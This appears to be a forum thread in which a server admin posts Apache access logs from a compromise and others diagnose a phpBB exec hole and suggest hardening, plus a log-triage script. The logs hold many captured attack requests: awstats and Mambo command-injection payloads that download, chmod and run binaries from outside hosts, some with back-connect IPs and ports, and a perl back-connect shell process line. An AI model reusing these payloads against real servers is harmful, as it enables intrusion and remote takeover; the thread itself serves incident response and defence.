80.55.222.242 - - [30/Jan/2006:01:29:15 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

80.55.222.242 - - [30/Jan/2006:01:29:28 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

67.38.15.199 - - [30/Jan/2006:05:32:39 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

67.38.15.199 - - [30/Jan/2006:05:32:40 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

67.38.15.199 - - [30/Jan/2006:05:32:44 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

212.55.131.187 - - [01/Feb/2006:03:46:37 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

212.55.131.187 - - [01/Feb/2006:03:46:42 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

212.55.131.187 - - [01/Feb/2006:03:46:43 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

203.140.30.86 - - [04/Feb/2006:02:40:52 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

203.140.30.86 - - [04/Feb/2006:02:40:53 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

203.140.30.86 - - [04/Feb/2006:02:40:55 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

218.200.122.35 - - [06/Feb/2006:17:02:42 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

218.200.122.35 - - [06/Feb/2006:17:02:44 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

218.200.122.35 - - [06/Feb/2006:17:02:45 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

216.72.4.139 - - [07/Feb/2006:20:31:43 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

216.72.4.139 - - [07/Feb/2006:20:31:45 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

216.72.4.139 - - [07/Feb/2006:20:31:46 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

217.151.96.164 - - [09/Feb/2006:03:24:43 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://161.58.46.248/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%2071.134.139.37%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 270

217.151.96.164 - - [09/Feb/2006:03:24:44 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://161.58.46.248/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%2071.134.139.37%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 269

217.151.96.164 - - [09/Feb/2006:03:24:45 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://161.58.46.248/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%2071.134.139.37%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 276

217.151.96.164 - - [09/Feb/2006:03:24:46 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://161.58.46.248/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%2071.134.139.37%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 274

12.36.175.159 - - [09/Feb/2006:20:11:28 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

12.36.175.159 - - [09/Feb/2006:20:11:29 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

12.36.175.159 - - [09/Feb/2006:20:11:30 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

206.173.28.253 - - [11/Feb/2006:07:40:09 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 276

206.173.28.253 - - [11/Feb/2006:07:40:10 -0800] "GET /cache/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 276

206.173.28.253 - - [11/Feb/2006:07:40:11 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 270

206.173.28.253 - - [11/Feb/2006:07:40:12 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113.25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo|  HTTP/1.1" 404 269

207.44.242.81 - - [11/Feb/2006:13:28:00 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

207.44.242.81 - - [11/Feb/2006:13:28:02 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

207.44.242.81 - - [11/Feb/2006:13:28:03 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

81.73.247.155 - - [11/Feb/2006:16:18:07 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%20202.155.79.13%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 270

81.73.247.155 - - [11/Feb/2006:16:18:09 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%20202.155.79.13%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 269

81.73.247.155 - - [11/Feb/2006:16:18:11 -0800] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%20202.155.79.13%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 276

81.73.247.155 - - [11/Feb/2006:16:18:13 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%20202.155.79.13%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 274

204.83.56.144 - - [12/Feb/2006:03:01:28 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

204.83.56.144 - - [12/Feb/2006:03:01:29 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

204.83.56.144 - - [12/Feb/2006:03:01:30 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

65.222.97.189 - - [12/Feb/2006:10:47:32 -0800] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

65.222.97.189 - - [12/Feb/2006:10:47:33 -0800] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 278

65.222.97.189 - - [12/Feb/2006:10:47:34 -0800] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20211%2e234%2e113%2e241%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|  HTTP/1.1" 404 286

195.49.161.209 - - [12/Feb/2006:10:54:34 -0800] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20lolox.xhost.ro/jojo;chmod%20744%20jojo;./jojo%20202.155.79.13%208080;00;echo%20YYY;echo|  HTTP/1.1" 404 270

195.49.161.209 - - [12/Feb/2006:10:54:35 -0800] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[optio

----------

## Sunthief

Sorry, guess those results were a little too long for the post.  Anyway, here's the confirmation that awstats hasn't been installed (as far as I can tell!)

```
sunsquared /var/log/apache2 $ emerge -s awstats

Searching...   

[ Results for search key : awstats ]

[ Applications found : 1 ]

 

*  net-www/awstats [ Masked ]

      Latest version available: 6.5

      Latest version installed: [ Not Installed ]

      Size of downloaded files: 949 kB

      Homepage:    http://awstats.sourceforge.net/

      Description: AWStats is short for Advanced Web Statistics.

      License:     GPL-2

```

----------

## Sunthief

Here's one that looks particularly interesting:

```
61.66.208.16 - - [15/Jan/2006:02:35:08 -0800] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20200.207.91.25/bash;chmod%20744%20bash;./bash;0209.61.187.106%208080;08080;0;echo%20YYY;echo|  HTTP/1.1" 404 274

```

Looks like he's trying to set the absolute path to his own site then run scripts to do god knows what???  What else can I do besides updating software that can help prevent this kind of stuff from happening??

I also did a locate for awstats

```
sunsquared /var/log/apache2 $ locate awstats   

/usr/portage/net-www/awstats

/usr/portage/net-www/awstats/awstats-6.3-r2.ebuild

/usr/portage/net-www/awstats/awstats-6.4.ebuild

/usr/portage/net-www/awstats/metadata.xml

/usr/portage/net-www/awstats/Manifest

/usr/portage/net-www/awstats/ChangeLog

/usr/portage/net-www/awstats/files

/usr/portage/net-www/awstats/files/postinst-en.txt

/usr/portage/net-www/awstats/files/digest-awstats-6.3-r2

/usr/portage/net-www/awstats/files/awstats-6.3-CAN-2005-0363.diff

/usr/portage/net-www/awstats/files/digest-awstats-6.4

/usr/portage/net-www/awstats/files/awstats-6.3-gentoo.diff

/usr/portage/net-www/awstats/files/digest-awstats-6.5

/usr/portage/net-www/awstats/awstats-6.5.ebuild

/usr/portage/metadata/cache/net-www/awstats-6.4

/usr/portage/metadata/cache/net-www/awstats-6.3-r2

/usr/portage/metadata/cache/net-www/awstats-6.5

/var/cache/edb/dep/usr/portage/net-www/awstats-6.3-r2

/var/cache/edb/dep/usr/portage/net-www/awstats-6.4

/var/cache/edb/dep/usr/portage/net-www/awstats-6.5

```

----------

## Sunthief

Ok the most popular version of phpbb that I have on my server is :

v 1.99.2.3 2004/07/11

but that just looks like the index.php file version, the directory is in phpbb2, which points to the newish version that they have now.  I don't want to start up apache again and look at what version it says, so is there another way to find the version??

----------

## Noyan

u hacked cuz of phpBB remote code exec exploit. U can see perl command exec as apache..

probably (%99) script kiddie uploaded exploit code via upload (avatar upload etc any kind of this) and rename to original via remote code exec

----------

## Sunthief

So I take it the exec exploit has been fixed in future versions.  My question is then where can I find logs that confirm that it was phpbb that was the security hole?  I really want to make sure that I am fixing the problem before I put the websites back up.  Thanks
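A triage pass over access-log lines like the ones posted earlier in this thread, as an added example that is not part of the original posts: it URL-decodes each request, labels the awstats `configdir` and Mambo `mosConfig_absolute_path` probes, and separates requests that returned 404 from those the server actually answered. The sample lines, the addresses (documentation ranges), the `payload` name and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the probes in this thread.
# Addresses are from documentation ranges; "payload" is a placeholder name.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jan/2006:10:50:13 -0800] "GET /cgi-bin/awstats.pl?configdir='
    '|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198%2e51%2e100%2e7%2fpayload%3bchmod%20%2bx'
    '%20payload%3b%2e%2fpayload;echo%20YYY;echo|  HTTP/1.1" 404 278',
    '192.0.2.11 - - [24/Jan/2006:22:36:44 -0800] "GET /mambo/index2.php?_REQUEST[option]'
    '=com_content&GLOBALS=&mosConfig_absolute_path=http://198.51.100.8/cmd.gif?&cmd='
    'cd%20/tmp;wget%20198.51.100.9/payload;chmod%20744%20payload;./payload;echo|  '
    'HTTP/1.1" 404 276',
    '192.0.2.12 - - [25/Jan/2006:08:00:00 -0800] "GET /phpbb2/viewtopic.php?t=1 HTTP/1.1" 200 5120',
    '192.0.2.13 - - [26/Jan/2006:09:00:00 -0800] "GET /index.php?mosConfig_absolute_path='
    'http://198.51.100.8/cmd.gif? HTTP/1.1" 200 4096',
]

# Common/combined log format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<request>.*?)" (?P<status>\d{3}) (?P<size>\S+)')
REQ_RE = re.compile(r'^(?P<method>[A-Z]+) (?P<target>.*?)\s+HTTP/\d\.\d$')
AWSTATS_RE = re.compile(r'configdir=[^&]*\|')            # pipe inside configdir
RFI_RE = re.compile(r'mosConfig_absolute_path=(?:https?|ftp)://', re.I)
FETCH_RE = re.compile(r'\b(?:wget|curl)\s+([^\s;|&]+)')  # what the request fetches


def parse_line(line):
    """Return ip, time, path, decoded query and status, or None if unparsable."""
    m = LOG_RE.match(line)
    r = REQ_RE.match(m['request']) if m else None
    if r is None:
        return None
    path, _, query = r['target'].partition('?')   # split on the first '?' only
    return {'ip': m['ip'], 'time': m['time'], 'path': path,
            'query': unquote(query), 'status': int(m['status'])}


def classify(entry):
    """Label the probe types seen in this thread's log."""
    q, labels = entry['query'], []
    if entry['path'].endswith('awstats.pl') and AWSTATS_RE.search(q):
        labels.append('awstats-configdir-injection')
    if RFI_RE.search(q):
        labels.append('mambo-remote-include')
    if FETCH_RE.search(q) and 'chmod' in q:
        labels.append('download-and-execute')
    return labels


def outcome(status):
    """404 means the probed script is absent; 2xx means something answered."""
    if status == 404:
        return 'not-found'
    return 'served' if 200 <= status < 300 else 'review'


def triage(lines):
    findings = []
    for line in lines:
        entry = parse_line(line)
        labels = classify(entry) if entry else []
        if labels:
            findings.append({'ip': entry['ip'], 'time': entry['time'],
                             'path': entry['path'], 'status': entry['status'],
                             'labels': labels, 'outcome': outcome(entry['status']),
                             'fetched': FETCH_RE.findall(entry['query'])})
    return findings


def needs_follow_up(findings):
    """Probes that did not hit a 404 are the ones worth investigating first."""
    return [f for f in findings if f['outcome'] != 'not-found']


if __name__ == '__main__':
    for f in triage(SAMPLE_LOG):
        print(f['time'], f['ip'], f['status'], f['outcome'], f['labels'], f['fetched'])
```

A `served` result only says the targeted script exists and answered; it has to be correlated with the error log, new files in writable directories and the process list before calling it the entry point.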

----------

## Noyan

add noexec to /tmp first

run apache as nobody

use chroot env for apache

and 

use snort

----------

## Sunthief

Thanks so much for the suggestions, unfortunately it appears that both noexec & snort are written to work on sparc systems like mine, but both look very useful, I might use them at work.  

So I guess I'm limited to trying to run apache as nobody and maybe a chroot env, do u think that these two solutions alone will stop my issue?  I guess there's only one way to find out   :Rolling Eyes: 

----------

## Noyan

first sorry for my bad english.. Let me explain more

If you run apache as user "nobody", all commands (talking about remote exec commands) will run as nobody so when someone attempts to exec a remote code via apache (example rm -rf / :p ), they cannot delete or cp anything. (permissions)

With snort + auto iptables (look for snort howto in official site) What you can do?

You can stop DOS (yeah really u can stop  :Very Happy:  ) or if you can write fingerprint u can solve your solution (phpBB)

But i prefer mod_security for apache..

```
apache   26013  0.0  0.0   2832  1464 ?        S    01:20   0:00 sh -c perl /tmp/mata.txt 217.146.91.1 50000 2>&1 3>&1 
```

u see this ?

Let me simulate this action (with noexec in /tmp)

```
$ sh -c perl /tmp/mata.txt 217.146.91.1 50000 2>&1 3>&1 
Permission denied...
```

Script kiddie should search another place to write and exec this code now.

etc

----------

## adelante

I wrote this a while back, you might find it useful:

http://www.systemshock.co.za/forums/index.php?showtopic=3163

----------

## Sunthief

Thank you very much!  That looks like it stopped exec in the /tmp directory and would have saved me earlier!! My question is, do I need to start that each time the system starts up??  It seems like something I would have to add to my fstab??  Thanks again!

----------

